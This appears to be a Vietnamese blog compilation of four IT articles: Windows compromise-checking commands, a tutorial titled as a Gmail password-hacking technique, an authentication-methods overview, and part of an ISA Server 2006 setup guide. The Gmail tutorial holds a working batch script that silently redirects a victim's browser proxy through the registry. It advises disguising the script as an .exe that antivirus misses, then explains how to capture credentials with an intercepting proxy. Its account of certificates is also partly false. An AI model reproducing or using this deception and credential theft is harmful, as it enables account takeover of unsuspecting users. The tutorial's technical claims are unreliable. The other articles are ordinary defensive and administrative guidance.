Xác định hệ thống bị tấn công bằng các lệnh Windows

Các máy tính Windows là những máy tính bị tấn công nhiều nhất. Chính vì vậy mà Microsoft đã xây dựng rất nhiều công cụ trong hệ điều hành Windows để các quản trị viên và một số người dùng có thể phân tích nhằm xác định xem máy tính của họ hiện có bị thỏa hiệp hay không. Trong hướng dẫn gồm hai phần này, phần đầu tiên chúng tôi sẽ giới thiệu cho các bạn về 5 công cụ dòng lệnh hữu dụng trong Windows để thực hiện một hành động phân tích đó.

1. WMIC

Windows Management Instrumentation Command-line (WMIC) không chỉ đơn thuần là một lệnh mà có rất nhiều tính năng khác. Công cụ này có một giao diện dòng lệnh cho Windows Management Instrumentation API bên trong Windows. WMIC cho phép quản lý người dùng truy cập các thông tin chi tiết trên máy tính Windows, gồm có các thuộc tính chi tiết của hàng ngàn các thiết lập và đối tượng. WMIC được xây dựng bên trong Windows XP Professional, Windows 2003 và Windows Vista. Để sử dụng nó, người dùng phải khởi chạy chương trình bằng cách chạy lệnh WMIC, theo sau là phần mà người dùng quan tâm (thường được gọi là các alias bên trong hệ thống). Cho ví dụ, để biết về các quá trình đang chạy trên máy tính, người dùng có thể chạy lệnh:

C:\> wmic process

Phần đầu ra của lệnh này có vẻ khá khó đọc vì định không được chỉ định. Tuy nhiên với WMIC, đầu ra mà công cụ này cung cấp được định dạng hoàn toàn khác, trong đó phần “list full” sẽ hiển thị các thông tin chi tiết cho mỗi lĩnh vực mà người dùng quan tâm, còn phần “list brief” sẽ cung cấp một dòng đầu ra cho mỗi một mục báo cáo dưới sạng danh sách các mục, chẳng hạn như các quá trình đang chạy, các chương trình tự động khởi chạy và những chia sẻ hiện hữu.

Cho ví dụ, chúng ta có thể quan sát mọi quá trình đang chạy trên máy tính bằng cách chạy lệnh:

C:\> wmic process list brief

Lệnh trên sẽ hiển thị tên, ID của quá trình và quyền ưu tiên của mỗi quá trình đang chạy cũng như các thuộc tính khác. Để nhận thêm các thông tin chi tiết hơn, chạy lệnh:

C:\> wmic process list full

Lệnh này sẽ hiển thị tất cả các thông tin chi tiết, gồm có đường dẫn của file thực thi có liên kết với quá trình và lệnh triệu gọi dòng lệnh của nó. Khi nghiên cứu một máy tính có bị tiêm nhiễm hay không, quản trị viên cần phải xem xét từng quá trình để xác định xem các quá trình này có hợp lệ trên máy tính hay không, sau đó nghiên cứu các quá trình lạ hoặc không mong đợi bằng cách sử dụng các cỗ máy tìm kiếm.

Ngoài các alias về các quá trình, người dùng có thể thay thế startup để nhận danh sách các chương trình tự động khởi chạy trên máy tính, gồm có các chương trình khởi chạy khi hệ thống khởi động hoặc người dùng đăng nhập, đây là những chương trình được định nghĩa bởi một auto-start registry key hoặc thư mục:

C:\> wmic startup list full

Rất nhiều malware có thể tự động chạy trên máy tính bằng cách thêm một mục auto-start bên cạnh các mục hợp lệ khác có bên trong các công cụ antivirus hay các chương trình system tray. Người dùng có thể quan sát các thiết lập khác trên máy tính với WMIC bằng cách thay thế “startup” bằng “QFE” (cụm chữ cái viết tắt cho Quick Fix Engineering) để thấy được mức vá của một hệ thống, bằng “share“ để xem danh sách các file chia sẻ trên Windows hoặc bằng “useraccount” để thấy được các thiết lập tài khoản chi tiết của người dùng.

Một tùy chọn khác bên trong WMIC là khả năng chạy một lệnh để thu thập thông tin trên trên một chu kỳ nào đó bằng cách sử dụng cú pháp “/every:[N]” sau phần còn lại của lệnh WMIC. [N] ở đây là một số nguyên, chỉ thị rằng WMIC sẽ chạy lệnh trên cứ [N] giây một lần. Bằng cách đó, người dùng có thể tìm kiếm các thay đổi trong các thiết lập của hệ thống theo thời gian, cho phép khảo sát một cách kỹ lưỡng đầu ra. Sử dụng chức năng này để kéo toàn bộ các thông tin về quá trình trong 5 giây một lần, người dùng có thể chạy:

C:\> wmic process list brief /every:1

Nhấn CTRL+C sẽ dừng chu kỳ.

2. Lệnh net

Giới thiệu ở trên, WMIC là một lệnh tương đối mới, tuy nhiên còn có một số lệnh khác không phải là mới nhưng khá hữu dụng đó là lệnh “net“. Các quản trị viên có thể sử dụng lệnh này để hiển thị tất cả các thông tin hữu dụng.

Cho ví dụ, lệnh “net user” sẽ hiển thị tất cả các tài khoản người dùng được định nghĩa nội bộ trên máy tính. Lệnh “net localgroup” sẽ hiển thị các nhóm, lệnh “net localgroup administrators” sẽ hiển thị thành viên của nhóm quản trị viên và lệnh “net start” hiển thị các dịch vụ đang chạy.

Các hacker thường đưa người dùng vào một hệ thống hoặc đặt các tài khoản của họ vào một nhóm quản trị viên, vì vậy chúng ta luôn phải kiểm tra đầu ra của các lệnh này để xem liệu hacker đã sửa đổi các tài khoản trên máy tính hay chưa. Thêm vào đó, một số hacker có thể tạo các dịch vụ xấu trên máy tính, vì vậy người dùng nên cần thận với chúng.

3. Openfiles

Nhiều quản trị viên Windows không quen với việc sử dụng các lệnh openfiles mạnh có trong Windows. Mặc dù vậy, như tên ngụ ý của nó, lệnh này sẽ hiển thị tất cả các file được mở trong máy tính, chỉ thị tên quá trình đang tương tác với mỗi file. Nó được xây dựng trong các phiên bản Windows đời mới, từ XP Pro đến Vista. Giống như lệnh lsof phổ biến cho Linux và Unix, nó cũng thể hiện cho các quản trị viên tất cả các file đang mở trên máy tính, cung cấp tên quá tình và đường dẫn hoàn chỉnh cho mỗi file. Tuy nhiên không giống như lsof, nó không cung cấp nhiều thông tin chi tiết, chẳng hạn như số ID của quá trình, số người dùng hoặc các thông tin khác.

Xem xét phân vùng thông tin mà nó thu thập được, bạn sẽ không hề ngạc nhiên rằng lệnh openfiles thực sự tiêu hao rất nhiều hiệu suất. Chính vì vậy, thông thường các quá trình có liên quan đến openfiles bị tắt mặc định, nghĩa là người dùng không thể kéo bất cứ dữ liệu nào từ lệnh này cho tới khi bật nó. Chức năng này có thể được kích hoạt bằng cách chạy lệnh:

C:\> openfiles /local on

Người dùng sẽ cần phải khởi động lại và khi hệ thống hoạt động trở lại, họ sẽ có thể chạy lệnh openfiles như dưới đây:

C:\> openfiles /query /v

Lệnh này sẽ hiển thị đầu ra một cách chi tiết, gồm có tài khoản người dùng mà quá trình cho một file mở đang chạy bên trong. Từ đó có thể nhận biết được malware gì đã được cài đặt, hoặc tấn công gì có thể đang được thực hiện trên máy tính, người dùng nên tìm kiếm các file dị thường hoặc các file không mong đợi, đặc biệt các file có liên quan đến những người dùng nội bộ không mong đợi trên máy tính.

Khi kết thúc với lệnh openfiles, chức năng tính toán của nó có thể được tắt bỏ và hệ thống sẽ trở lại với tình trạng hiệu suất bình thường bằng cách chạy lệnh dưới đây và khởi động lại máy tính:

C:\> openfiles /local off

4. Netstat

Lệnh netstat trong Windows có thể hiển thị hành vi mạng, tập trung vào TCP và UDP mặc định. Vì malware thường truyền thông trong toàn mạng, nên người dùng có thể tìm kiếm các kết nối không bình thường trong đầu ra của netstat, chạy lệnh dưới đây:

C:\> netstat -nao

Tùy chọn –n sẽ thông báo cho netstat hiển thị các số trong đầu ra của nó, trừ tên máy và giao thức mà thay vì đó sẽ hiển thị các địa chỉ IP và TCP hoặc số cổng UDP. –a chỉ thị hiển thị tất cả các kết nối và các cổng đang lắng nghe. Tùy chọn –o thông báo cho netstat hiển thị số processID của mỗi chương trình đang tương tác với cổng TCP hoặc UDP. Nếu thay vì TCP và UDP, bạn chỉ quan tâm đến ICMP, khi đó bạn có thể chạy lệnh netstat như dưới đây:

C:\> netstat –s –p icmp

Lệnh trên chỉ thị rằng nó sẽ trả về thống kê (-s) của giao thức ICMP. Mặc dù không thể hiện nhiều chi tiết bằng TCP và UDP nhưng người dùng có thể thấy được liệu máy tính có đang gửi lưu lượng ICMP không mong đợi trên mạng hay không. Tuy nhiên một số backdoor và một số malware khác có thể truyền thông bằng cách sử dụng tải trọng của các thư ICMP Echo.

Giống như WMIC, lệnh netstat cũng cho phép chúng ta chạy nó theo một chu kỳ lặp đi lặp lại. Tuy nhiên thay vì sử dụng cú pháp “/every:[N]” như WMIC, người dùng chỉ cần thêm sau lệnh triệu gọi netstat dấu cách và số nguyên. Như vậy, để liệt kê các cổng TCP và UDP đang sử dụng trên máy tính cứ sau 2 giây một lần, người dùng có thể chạy:

C:\> netstat –na 2

5. Find

Hầu hết các lệnh mà chúng tôi đã giới thiệu cho đến đây đều hiển thị rất nhiều đầu ra trên màn hình, điều này đôi khi làm khó người dùng trong việc quan sát toàn bộ để tìm ra một mục nào đó mà họ quan tâm. Tuy nhiên Windows có một công cụ khác có thể giúp bạn khắc phục điều này. Người dùng có thể tìm kiếm trong toàn bộ đầu ra của mỗi lệnh bằng cách sử dụng lệnh findstr và find trong Windows. Lệnh find sẽ tìm kiếm các chuỗi đơn giản, trong khi đó lệnh findstr sẽ hỗ trợ cho các từ ngữ thông thường, một cách phức tạp hơn để phân biệt các mẫu tìm kiếm. Do các từ ngữ thông thường được hỗ trợ bởi findstr vượt ra ngoài phạm vi của bài viết này, nên chúng tôi chỉ tập trung vào lệnh find. Mặc định lệnh find sẽ phân biệt giữa chữ hoa và chữ thường, tuy nhiên bằng cách sử dụng tùy chọn /i bạn có thể làm mất đi sự phân biệt này.
Lệnh find cũng có khả năng đếm. Được triệu gọi với lệnh /c, nó sẽ đếm số dòng của đầu ra gồm có chuỗi đã cho. Nếu người dùng muốn đếm số lượng dòng trong đầu ra của lệnh để biết được số lượng quá trình đang chạy, số lượng mục startup đang hiện diện, hoặc một loạt các hành động khác trên máy. Để đếm số dòng đầu ra, người dùng có thể dẫn đầu ra của họ qua find /c /v “”. Lệnh này sẽ đếm (/c) số dòng trừ dòng trống.

Lúc này, với lệnh find, người dùng có thể quan sát đầu ra của mỗi một lệnh mà chúng tôi đã giới thiệu cho đến đây để tìm ra những điều thú vị riêng. Cho ví dụ, để xem thông tin mỗi giây về các quá trình cmd.exe đang chạy trên máy tính, bạn hãy đánh:

C:\> wmic process list brief /every:1 | find “cmd.exe”

Để đếm số file mở trên máy tính khi openfiles được kích hoạt, bạn chỉ cần đánh:

C:\> openfiles /query /v | find /c /v “”

Dù có đếm các mục theo một cách nào đi nữa, các bạn cần nhớ trừ đi số dòng được liên kết với header cột. Ví dụ, để xem với độ chính xác theo mỗi giây khi cổng TCP 2222 bắt đầu được sử dụng trên máy tính, cùng với process ID đang sử dụng trên cổng, chạy:

C:\> netstat –nao 1 | find “2222″

Nghiên cứu đầu ra

Với 5 công cụ này, người dùng có thể xử lý các thông tin về cấu hình, trạng thái bảo mật của mỗi một máy tính Windows. Mặc dù vậy để sử dụng mỗi lệnh trong việc nhận diện sự thỏa hiệp, người dùng cần phải so sánh các thiết lập hiện hành củ máy tính bị nghi ngờ với máy tính bình thường.

Có ba cách có thể thiết lập sự so sánh này. Đầu tiên, nếu người dùng là một “thợ săn” malware đã có kinh nghiệm thì anh ta có thể nhận biết về những gì đúng và những gì sai với máy tính, nhận ra những vấn đề không bình thường dựa trên kinh nghiệm. Cách thứ hai, so sánh này có thể được thực hiện với một máy không bị tiêm nhiễm nếu có. Nếu không có một máy tính “sạch”, người dùng có thể dựa vào tùy cách thứ ba – tìm kiếm các file, tên quá trình, tên file và số cổng cụ thể được nhận biết bởi các lệnh này và tìm kiếm chúng online nhằm xác định xem chúng có phải là các file thông thường cho máy tính và phần mềm mà nó đã cài đặt hay có liên quan tới một số loại malware.

Trong phần này, chúng tôi đã giới thiệu cho các bạn 5 lệnh rất mạnh trong Windows. Trong phần tiếp theo của loạt bài này, chúng tôi sẽ giới thiệu tiếp cho các bạn 5 lệnh hữu dụng khác từ dòng lệnh.

Nguồn : Quản trị mạng

Chuyên mục:Computer-Internet

Kỹ thuật hack password Gmail

 

Bài viết do anh Hoàng Tuấn Đạt, giảng viên bộ môn CEH biên soạn.

Kỹ thuật hack password Gmail

Trong bài viết này tôi sẽ trình bày với các bạn kỹ thuật Hack Password của Gmail hay các trang web khác xác thực một cách tương tự (SSL – Certificate – HTTPS). Đối với nguy cơ bạn có thể bị lộ Password Gmail, trong bài viết này tôi sẽ trình bày cách nhận biết và ngăn chặn nguy cơ này.

I. Hiểu biết chung
Gmail hay những dịch vụ web khác thường sử dụng HTTPS để mã hóa gói tin User/Pass. Khi trình duyệt web sử dụng Certificate của Gmail cung cấp và mã hóa thì gói tin User/Pass khi đi trên mạng sẽ an toàn ở mức độ (gần như tuyệt đối).
Kẽ hở ở đây là thế nào mà lại có thể Hack được pass của những phương thức xác thực và mã hóa có tính bảo mật cao.

Quá trình xác thực bình thường khi người dùng truy cập Gmail:

Bước 1: Người dùng truy cập gmail.com
Bước 2: Gmail sẽ gửi thông tin tới Versign để lấy Certificate
Bước 3: Versign gửi lại cho Gmail Certificate bao gồm: Public Key và Private key
Bước 4: Gmail gửi lại cho người dùng Public Key để mã hóa thông tin xác thực
Bước 5: Người dùng sử dụng Public Key mã hóa gửi lên Gmail
Bước 6: Gmail sử dụng Private key để giải mã

*note: gói tin mã hóa user/pass người dùng gửi lên gmail được mã hóa bằng public key thì chỉ có private key mới giải mã dc. Trong khi đó Private key được Gmail dữ lại và không truyền trên mạng. Nên gói tin này cực kỳ bảo mật và không có khả năng giải mã

Kỹ thuật giả mạo Certifcate
Người dùng vào Gmail sẽ không đi thẳng mà đi qua một Intercepting Proxy và bị giả mạo Certificate

Bước 1: Người dùng vào Gmail
Bước 2: Khi gói tin từ người dùng vào Intercept proxy nó sẽ chỉnh sửa thông tin và gửi lên Gmail
Bước 3: Gmail gửi yêu cầu lên Versign để sinh Certificate
Bước 4: Verisign gửi Certificate về cho Gmail. Gmail dữ lại Private key và gửi cho người yêu cầu Public key
Bước 5: Gmail gửi Public key cho Intercept Proxy, Key này sẽ không được gửi cho người dùng
Bước 6: Intercept Proxy tự ra một cặp key và gửi Public key về cho người dùng
Bước 7: Người dùng sử dụng Public Key giả này do Proxy sinh ra để mã hóa user/pass và gửi lên cho proxy. Proxy do tự sinh ra cặp key nên sẽ có Private key để giải mã.
Bước 8: Sau khi giải mã được gói tin người dùng truyền lên Proxy sẽ sử dụng Public Key của Gmail gửi cho rồi mã hóa à gửi lên gmail và quá trình xác thực vẫn dc thực hiện
*Note: Khi đó nếu kẻ tấn công đứng trên con Intercept Proxy thì hoàn toàn có thể biết được User/Pass của người dùng. Người dùng không chú ý khi đi qua một Intercept proxy thì user/pass hoàn toàn có thể bị lộ, mặc dù sử dụng các phương thức xác thực rất bảo mật

II. Tools sử dụng
Burpsuite_v1.3
Link download: http://www.portswigger.net/suite/burpsuite_v1.3.zip
Đây là một tools có tính năng là một Intercept Proxy
-Java (Burpsuite là file .jar chạy trên nền Java)
Link download: http://sun.com
– IE, Firefox
– Tools thiết lập Proxy bằng một file
Đây là tools tôi tự viết dạng file .bat hoặc các bạn có thể chuyển file.bat sang file.exe để khi người dùng kích vào file này sẽ tự động thiết lập Proxy
– Quick_Batch_File_Compiler_3.21 là một tools chuyển file.bat à file.exe

III. Kỹ thuật lấy Password Gmail
– Cách thông thường nhất là sử dụng Keylogger nhưng cách này không sử dụng được khi có các chương trình diệt virus mạnh.
– Export thông tin từ trình duyệt web như IE, Firefox. Cách này không thực hiện được khi người dùng không lưu User/Pass trên trình duyệt
– Còn một cách đó là giả mạo Certificate và sử dụng Intercept Proxy
a. Đặt proxy cho người dùng
– Để toàn bộ nội dung người dùng truy cập web đi qua Intercept Proxy thì cần phải thiết lập proxy trên trình duyệt của người dùng
– Cách thiết lập có thể bạn thiết lập bằng tay (bằng một cách nào đó có quyền điều khiển máy tính của nạn nhân)
– Hướng người dùng chạy một file.exe mà do chúng ta viết để thiết lập proxy
********
Tạo ra một file.bat với nội dung:
Code:

Code:
echo Windows Registry Editor Version 5.00 > 1
echo [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet Settings] >2
echo "MigrateProxy"=dword:00000001 > 3
echo "ProxyEnable"=dword:00000001 > 4
echo "ProxyHttp1.1"=dword:00000000 > 5
echo "ProxyServer"="IP:port" > 6
echo "ProxyOverride"="<local>" > 7
copy /b "1"+"2"+"3"+"4"+"5"+"6"+"7" b.reg
del 1 /f /q
del 2 /f /q
del 3 /f /q
del 4 /f /q
del 5 /f /q
del 6 /f /q
del 7 /f /q
regedit.exe /s b.reg
del b.reg /f /q

Sau đó dùng tools Quick_Batch_File_Compiler_3.21 chuyển file.bat này sang file.exe
– Khi người dùng nhấn vào file này sẽ tự động thiết lập proxy cho IE với IP bạn thay bằng IP bạn cần thiết lập, Port là port của Proxy sử dụng. Điều rất hay đó là file này tất cả các chương trình diệt virus đều không coi là Virus
– Trong bài viết này tôi sử dụng một máy tính nên proxy tôi thiết lập trên trình duyệt là 127.0.0.1
Tiến hành
Bước 1: Cài đặt Java
Bước 2: Chạy Burpsuite
Bước 3: Thiết lập Proxy
Bước 4: Truy cập Gmail
Bước 5: Vào Proxy xem thông tin User/Pass

Bước 1: Cài đặt Java:
– Sau khi bạn download bộ cài Java từ trang sun.com bạn cài đặt để chuẩn bị môi trường cho các chương trình chạy trên môi trường Java
Bước 2: Chạy Burpsuite:
– Sau khi download Burpsuite tiến hành giải nén khi đến file .jar thì dừng lại
Chạy chương trình Burpsuite_v1.3 để làm Intercepting Proxy. Nhấn đúp vào file .jar giải nén từ bộ download được

Chạy chương trình Burpsuite

Mặc định chương trình này chỉ làm proxy cho chính máy chạy chương trình, để các máy khác có thể sử dụng chương trình này làm proxy phải à Vào tab proxy à chọn Options rồi có thể Edit tùy biến port sử dụng (mặc định là 8080) bỏ dấu check box “loopback only”


Chuyển sang tab Intercept để cấu hình các mode hoạt động của Intercepting proxy
– Chế độ Intercept on: đây là chế độ hoạt động. Nếu một người đặt máy tính này làm proxy thì toàn bộ quá trình truy cập ra internet đều bị proxy này quản lý. Khi một request từ trình duyệt tới Proxy, nó sẽ phát hiện nội dung có thể chỉnh sửa và forward đi thì mới tới máy chủ web
Chúng ta tắt chế đô này bằng cách nhấn vào Intercept on sẽ thành off. Mục đích khi người dùng sử dụng phần mềm này làm proxy thì vẫn có thể vào Internet bình thường. Để chế độ này chỉ để lưu lại các thông tin người dùng truy cập web

Bước 3: Đặt Proxy
– Vào IE chỉnh proxy vào địa chỉ 127.0.0.1 port 8080. IE à IE options à tab connection nhấn vào nút LAN Settings
– Hoặc chạy file.bat với nội dung như trên
Dùng tools chuyển file.bat à file.exe rồi chạy file.exe này cũng được

Bước 4: Vào Gmail qua IE (đã thiết lập Proxy)
Truy cập vào Gmail sẽ thấy thông báo Certificate lỗi nhấn continue để tiếp tục

Tiếp tục google sẽ thông báo Certificate Error bạn vẫn gõ Username password để truy cập vào Mail

Tôi vào được mail vẫn còn thông báo Certificate Error

Bước 5: Vào Proxy tìm thông tin Username và Pass

– Vào Burpsuite à Chuyển sang tab “Target” à Chọn Site Map
Lựa chọn trang web https://www.google.com à Vào mục Accounts à Vào mục ServiceLoginAuth à Nhìn chuyển sang bên phải chọn “Request” (thông tin gửi lên server) vào mục Raw chúng ta sẽ thấy thông tin Username và Password

IV. Phát hiện và bảo mật cho Account Gmail
Muốn hack password gmail kẻ tấn công phải hướng người dùng đặt Proxy đi qua một Intercept Proxy sau đó giả mạo Certificate do đó muốn phát hiện và bảo mật cho Account Gmail bạn có thể thực hiện bằng các cách:

1. Phát hiện khi vào mạng có qua một Proxy hay không
Kiểm tra bằng cách trước khi vào Internet truy cập vào mục thiết lập Proxy xem có địa chỉ nào được thiết lập hay chưa.
Cách này rất hữu ích nhưng xem ra có phần rườm rà khó thực hiện và dễ bị quên hay bỏ qua

2. Phát hiện Certificate bị giả mạo
a. Khi truy cập bình thường
+ Vào Gmail sẽ không bật ra nhưng pop-up đề xuất download Certificate
+ Nhấn chuột vào biểu tượng cục khóa à view Certifcate sẽ thấy nó được sinh ra từ Verisign

Khi truy cập đi qua một Intercept Proxy
+ Truy cập vào Gmail sẽ xuất hiện cửa sổ này thông báo Certificate của bạn đã bị lỗi có tiếp tục hay không. Nếu thấy biểu tượng này khuyến cáo người dùng không nên tiếp tục và kiểm tra lại độ an toàn của mạng và máy tính trước khi truy cập

+ Nếu người dùng tiếp tục truy cập vào trang Gmail sẽ không có biểu tượng cục khóa mà thay vào đó là biểu tượng “Certificate Error”.
+ Nhấn xem Certificate này chúng ta sẽ thấy Certificate này không phải do Verisign sinh ra

Note: Nếu người dùng thấy hai yếu tố này khuyến cáo không nên tiếp tục vào Gmail vì Username và password của bạn hoàn toàn có thể bị mất. Ngoài ra người dùng không nên lưu mật khẩu để tự động truy cập bởi khi máy tính rơi vào tay người khác thì thông tin còn lưu lại trên IE, Firefox hoàn toan có thể bị khai thác dễ dàng. Người dùng cũng nên cài đặt các chương trình diệt Virus để ngăn chặn các loại Virus, Keylogger ăn chôm mật khẩu

Chuyên mục:Computer-Internet

Các phương thức xác thực -Authentication Methods

Bạn đã được học về xác thực (authentication), đây là một trong 4 nhân tố chính trong bảo mật computer. Mặc dù authentication luôn có cùng một mục tiêu, nhưng có nhiều cách tiếp cận khác nhau để hoàn thành..

Trong chủ đề này, chúng ta sẽ thảo luận vài phương thức xác thực chính phổ biến hiện nay. Một số nhân tố được sử dụng chính trong xác thực chẳng hạn:

• password (mật mã)

• key (khóa)

• fingerprints (vân tay)

Authentication-factor

Xác thực dựa trên User Name và Password
Sự kết hợp của một user name và password là cách xác thực cơ bản nhất. Với kiểu xác thực này, chứng từ ủy nhiệm User được đối chiếu với chứng từ được lưu trữ trên database hệ thống , nếu trùng khớp username và password, thì user được xác thực và nếu không User bị cấm truy cập. Phương thức này không bảo mật lắm vì chứng từ xác nhận User được gửi đi xác thực trong tình trạng plain text, tức không được mã hóa và có thể bị tóm trên đường truyền.


Hình – 1: User name/password authentication
Challenge Handshake Authentication Protocol (CHAP)
Challenge Handshake Authentication Protocol (CHAP) cũng là mô hình xác thực dựa trên user name/password. Khi user cố gắng log on, server đảm nhiệm vai trò xác thực sẽ gửi một thông điệp thử thách (challenge message) trở lại máy tính User. Lúc này máy tính User sẽ phản hồi lại user name và password được mã hóa. Server xác thực sẽ so sánh phiên bản xác thực User được lưu giữ với phiên bản mã hóa vừa nhận , nếu trùng khớp, user sẽ được authenticated. Bản thân
Password không bao giờ được gửi qua network. Phương thức CHAP thường được sử dụng khi User logon vào các remote servers của cty chẳng hạn như RAS server.

Dữ liệu chứa password được mã hóa gọi là password băm (hash password). Một gói băm là một loại mã hóa không có phương cách giải mã.

Hình – 2: CHAP
Kerberos
Kerberos authentication dùng một Server trung tâm để kiểm tra việc xác thực user và cấp phát thẻ thông hành (service
tickets) để User có thể truy cập vào tài nguyên. Kerberos là một phương thức rất an toàn trong authentication bởi vì dùng cấp độ mã hóa rất mạnh. Kerberos cũng dựa trên độ chính xác của thời gian xác thực giữa Server và Client Computer, do đó cần đảm bảo có một time server hoặc authenticating servers được đồng bộ time từ các Internet time server.
Kerberos là nền tảng xác thực chính của nhiều OS như Unix, Windows


Hình – 3: Kerberos
Tokens
Tokens là phương tiện vật lý như các thẻ thông minh (smart cards) hoặc thẻ đeo của nhân viên (ID badges) chứa thông tin xác thực. Tokens có thể lưu trữ số nhận dạng cá nhân-personal identification numbers (PINs), thông tin về user, hoặc passwords. Các thông tin trên token chỉ có thể được đọc và xử lý bởi các thiết bị đặc dụng, ví dụ như thẻ smart card được đọc bởi đầu đọc smart card gắn trên Computer, sau đó thông tin này được gửi đến authenticating server. Tokens chứa chuỗi text hoặc giá trị số duy nhất thông thương mỗi giá trị này chỉ sử dụng một lần.

Hình – 4: Token

Ví dụ về Smart Cards

Smart cards là ví dụ điển hình về xác thực tokens- token-based authentication. Một smart card là một thẻ nhựa có gắn một chip máy tính lưu trữ các loại thông tin điện tử khác nhau. Nội dung thông tin của card được đọc với một thiết bị đặc biệt.

Biometrics

Biometrics (phương pháp nhận dạng sinh trắc học) mô hình xác thực dựa trên đặc điểm sinh học của từng cá nhân. Quét dấu vân tay (fingerprint scanner), quét võng mạc mắt (retinal scanner), nhận dạng giọng nói(voice-recognition), nhận dạng khuôn mặt(facerecognition).Vì nhận dạng sinh trắc học hiện rất tốn kém chi phí khi triển khai nên không được chấp nhận rộng rãi như các phương thức xác thực khác.

Hình – 5: Biometric
Multi-Factor Authentication

Multi-factor authentication, xác thực dựa trên nhiều nhân tố kết hợp, là mô hình xác thực yêu cầu kiểm ít nhất 2 nhân tố xác thực .Có thể đó là sự kết hợp của bất cứ nhân tố nào ví dụ như: bạn là ai, bạn có gì chứng minh, và bạn biết gì?.

Ví dụ: về một Multi-Factor Implementation:

Cần phải đưa thẽ nhận dạng vào đầu đọc và cho biết tiếp password là gì


Hình – 6: Mutil – Factor Authentication
Mutual Authentication

Mutual authentication, xác thực lẫn nhau là kỹ thuật bảo mật mà mỗi thành phần tham gia giao tiếp với nhau kiểm tra lẫn nhau. Trước hết Server chứa tài nguyên kiểm tra “giấy phép truy cập” của client và sau đó client lại kiểm tra “giấy phép cấp
tài nguyên” của Server. Điều này giống như khi bạn giao dịch với một Server của bank, bạn cần kiểm tra Server xem có đúng của bank không hay là một cái bẫy của hacker giăng ra, à ngược lại Server bank sẽ kiểm tra bạn…


Hình – 7: Mutual authentication
Trên đây là một số phương pháp xác thực, hy vọng nó sẽ giúp các bạn có thể hiểu thêm về các phương pháp xác thực.

Chuyên mục:Computer-Internet

Cấu hình ISA server 2006 sau khi cài đặt

Có hang loạt các thao tác quản lý cơ bản mà bạn cần phải quan tâm ngay sau khi cài đặt ISA 2006 firewall. Các thao tác quản lý tường lửa cơ bản này thường độc lập với chính sách tường lửa bạn mà thiết lập sau này.
Bạn đang thiết lập hệ thống tường lửa Web proxy cơ bản cho phù hợp với công ty của bạn. Những thao tác sau khi cài đặt thay đổi theo loại hình cài đặt (Web proxy mode so với full firewall deployment), phiên bản ISA firewall được cài đặt (phiên bản Standard Edition hay phiên bản Enterprise Edition), và nếu Enterprise Edition thì tùy thuộc vào cấu hình Array (mảng cấu kết đơn lẻ, mảng đa cấu kết, mảng cấu kết tổ hợp nhóm làm việc, mảng cấu kết miền).
Bài viết này tiếp tục bài trước Cài đặt ISA Server 2006 Enterprise Edition trong việc cấu hình nhóm làm việc đơn lẻ cung cấp một danh sách các thao tác sau cài đặt. Mỗi quản trị ISA firewall cài đặt một mảng cấu kết đơn lẻ, Web proxy đơn lẻ tuân theo các thao tác sau:


• Sao lưu dự phòng cấu hình

• Gán Enterprise Roles

• Thiết lập CSS Policy Update Interval

• Gán Array Roles

• Thiết lập Alert Definitions

• Thay đổi Column Order trong Sessions Monitor

• Thiết lập Recurring Report Jobs

• Tùy biến Reports

• Thiết lập Log Summary và Report Preferences

• Thiết lập Connectivity Monitors

• Thiết lập Firewall và Web Proxy Logging

• Tạo và xuất Frequently Used Filter Definitions

• Nhập các địa chỉ IP của Remote Management Computers

• Thiết lập Direct Access List

• Thiết lập Web Chaining Rules

• Kích hoạt và thiết lập Web Cache

• Vô hiệu hóa Unused Application và Web Filters

• Thiết lập Compression Preferences

• Chỉ rõ Certificate Revocation Settings

• Chỉ rõ Diffserv Preferences

• Xác định LDAP và RADIUS Servers

• Thiết lập Intrusion Detection và DNS Attack Detection

• Xác định IP Preferences

• Thiết lập Flood Mitigation Settings

• Hệ thống Hardening – củng cố, làm cứng (tùy chọn)

• Sao lưu dự phòng lại cấu hình
Những nội dung dưới đây cung cấp một số thông tin cơ bản về những tùy chọn thiết lập sau khi cài đặt. Tuy nhiên vì vấn đề này khá phức tạp nên bài viết này chỉ đưa ra những miêu tả khái quát cơ bản. Bạn có thể tìm đọc thêm các chủ đề khác trong ấn phẩm sách ISA 2006 hoặc phần Help file của chương trình trước thiết lập các tùy chọn này.
install-isa-unihome

Hình 1.


Sao lưu dự phòng cấu hình

Để bảo đảm an toàn cho việc sao lưu các hệ thống file, hệ thống thư từ và các website bạn nên sao lưu cấu hình ISA firewall trước khi có bất kỳ sự thay đổi nào. Đây là điều đầu tiên bạn nên làm trước khi ngắt hệ thống sau khi cài đặt. Cũng khá dễ dàng để trở về tình trạng hiện thời, vậy còn đắn đo gì về điều này? Hãy sao lưu các cấu hình cơ sở và bạn sẽ dễ dàng trở lại trạng thái đó.


Thực hiện các bước sau để sao lưu cấu hình ISA firewall:

1. Ở bảng điều khiển ISA firewall, nhấp chuột phải vào nút trên cùng và nhấp chọn Export (Back Up).

2. Nhấp chọn Next trên cửa sổ Welcome to Export Wizard.

3. Trên cửa sổ Export Preference, đánh dấu Export confidential information và Export user permissions. Nhấn enter và xác
nhận mật khẩu để lưu giữ bảo vệ file. Ấn Next.
install-isa-unihome-2


Hình 2.

4. Trên cửa sổ Export File Location, nhập tên cho file cần sao lưu vào ô trống, sau đó ấn Next.
install-isa-unihome-3
Hình 3.

5. Nhấp chuột Finish trên cửa sổ Completing the Export Wizard.

6. Ấn Ok trong hộp thoại xác nhận để việc xuất dữ liệu đã thành công.


Gán vai trò Enterprise Roles

Dù chỉ có duy nhất một máy trong hệ thống ISA firewall Enterprise, bạn vẫn nên thiết lập cấu hình các Enterprise Roles. Đó là nơi cho phép bạn thiết lập các người dùng và các nhóm được quyền truy cập vào CSS và Monitor Arrays.
Để gán vai trò Enterprise roles, nhấp chuột phải vào Enterprise ở bên trái cửa sổ bảng điều khiên ISA firewall và chọn Properties. Trong hộp thoại Enterprise Properties, chọn tab Assign Roles. Bạn sẽ thấy xuất hiện bảng sau.
install-isa-unihome-4


Hình 4.

